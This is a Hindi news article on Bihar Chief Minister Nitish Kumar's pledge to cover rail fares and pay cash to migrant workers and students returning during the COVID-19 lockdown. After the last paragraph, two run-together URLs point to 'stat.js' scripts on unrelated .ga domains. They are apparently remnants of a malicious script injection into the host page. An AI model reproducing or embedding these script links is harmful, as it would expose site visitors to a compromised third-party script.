बिहार के मुख्यमंत्री नीतीश कुमार ने दूसरे प्रदेशों से लौट रहे श्रमिकों के लिए बड़ा ऐलान किया है। मुख्यमंत्री ने कहा लॉकडाउन के दौरान ट्रेन से बिहार वापस आने वाले छात्र, मजदूर और अन्य लोगों बिहार सरकार 500-500 रुपये देगी। इसके साथ ही उन्होंने स्पष्ट किया कि इन लोगों को रेल किराया देने की जरूरत नहीं है। यह हमारी जिम्मेदारी है।मुख्यमंत्री ने कहा कि राजस्थान के कोटा एवं अन्य स्थानों से जो भी छात्र बिहार आ रहे हैं उन्हें रेल किराया नहीं देना होगा। इसके लिए बिहार सरकार रेलवे को पैसा दे रही है। साथ ही बहार फंसे मजदूरों एवं अन्य लोगों के लिए भी निर्णय लिया है।

उनके यहां आने तक के खर्च भी सरकार उठाएगी और उन्हें अलग से 500 रुपये भी दिया जाएगा। मुख्यमंत्री ने कहा कि बाहर फंसे मजदूर एवं अन्य लोग जिस स्टेशन से ट्रेन पकड़ेंगे और उनके गंतव्य तक पहुंचने का किराया सरकार देगी। साथ ही 21 दिन का क्वारंटाइन पूरा होने के बाद प्रत्येक व्यक्ति को रेल किराया के अतिरिक्त 500 रुपये दिया जाएगा या बाहर से आने वाले प्रत्येक व्यक्ति को न्यूनतम एक हजार रुपये दिया जाएगा।

उन्होंने कहा कि प्रखंड मुख्यालय में बने क्वारंटाइन केंद्र में उनके खाने-पीने, रहने, चिकित्सा, शौचालय की बेहतर व्यवस्था की गई है। सीएम ने कहा कि हमलोग सदैव लोगों के हित में काम करते रहे हैं और चाहते हैं कि यह काम निरंतर होता रहे लेकिन हमने देखा है कि इधर काफी बयानबाजी हो रही है। इसको देखते हुए हमने सोचा कि बाहर फंसे लोगों के लिए हम जो कर रहे है उसकी जानकारी दे दी जाए अन्यथा लाभ मिलने के बाद लोग इसके बारे में अपने आप बताते।

मुख्यमंत्री ने कहा कि उनकी सरकार के इस निर्णय का अनुपालन भी शुरू हो गया है। उन्होंने कहा कि बिहार के बाहर फंसे लोगों को उनकी सरकार ने एक-एक हजार रुपये का देने का निर्णय लिया है और उनके आवेदन पर विचार के बाद लगभग 19 लाख लोगों के बैंक खाते में एक-एक हजार की राशि भेज दी गई है। शेष लोगों को शीघ्र ही यह राशि उपलब्ध करा दी जाएगी। मुख्यमंत्री ने कहा कि उनका सभी लोगों से आग्रह है।

बाहर से आ रहे लोगों को 21 दिन तक क्वारंटाइन केंद्र में रहने के लिए प्रेरित करें। यह सबके लिए उपयोगी है। उन्होंने कहा कि इक्का-दुक्का लोगों को छोड़कर राज्य के अधिकांश लोगों ने लॉकडाउन का सख्ती से पालन किया है और यही कारण है कि बिहार में कोरोना संक्रमण का प्रभाव सीमित रहा है। उन्होंने कहा कि बाहर से आए कुछ लोगों के कारण संक्रमण का प्रसार हुआ लेकिन राज्य के लोगों की जागृति के कारण उसका अधिक असर नहीं हुआ है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.